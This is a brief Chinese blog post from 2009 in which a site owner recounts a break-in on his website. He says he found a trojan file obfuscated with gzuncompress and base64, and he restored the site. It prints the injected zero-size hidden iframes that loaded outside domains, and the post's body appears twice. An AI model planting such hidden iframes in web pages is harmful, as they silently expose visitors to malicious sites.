第一次面临黑客入侵
2009-09-26 13:50:58
打开首页,只是觉得状态栏不太对,与我无关的域名出现好几个,下意识觉得是代码出了什么问题,打开文件,一切也就都明白了
<iframe src=http://0768.5d6d.com width=0 height=0></iframe> <iframe src=http://www.tyr4nt.cn width=0 height=0></iframe> <iframe src=http://www.y4game.cn width=0 height=0></iframe> <iframe src=http://www.tyr4nt.cn width=0 height=0></iframe> <iframe src=http://www.tba5.cn width=0 height=0></iframe>
凡是页面有这几个的都是被感染文件,本想联系tyr4nt交流交流,貌似联系不上,我对黑客并不是反感,所以也没什么大不了的,找了半天发现一个qqconfig.php的文件很是可疑,打开一看是gzuncompress+base64_decode加密的,用echo就把源打开了,靠!原来是一个木马~~~ 被入侵的时间是23日晚23.33 这也让我对网站的安全性提了个醒,网站在做,也敌不过黑客呀,值得考虑深思,下一步就开始弄弄安全课程了。 为了大家的安全,我删除了网站文件,以保证无残留,还好有mysql顶着,要不又要一场大工程了。恢复了就好了。
<iframe src=http://0768.5d6d.com width=0 height=0></iframe> <iframe src=http://www.tyr4nt.cn width=0 height=0></iframe> <iframe src=http://www.y4game.cn width=0 height=0></iframe> <iframe src=http://www.tyr4nt.cn width=0 height=0></iframe> <iframe src=http://www.tba5.cn width=0 height=0></iframe>
凡是页面有这几个的都是被感染文件,本想联系tyr4nt交流交流,貌似联系不上,我对黑客并不是反感,所以也没什么大不了的,找了半天发现一个qqconfig.php的文件很是可疑,打开一看是gzuncompress+base64_decode加密的,用echo就把源打开了,靠!原来是一个木马~~~ 被入侵的时间是23日晚23.33 这也让我对网站的安全性提了个醒,网站在做,也敌不过黑客呀,值得考虑深思,下一步就开始弄弄安全课程了。 为了大家的安全,我删除了网站文件,以保证无残留,还好有mysql顶着,要不又要一场大工程了。恢复了就好了。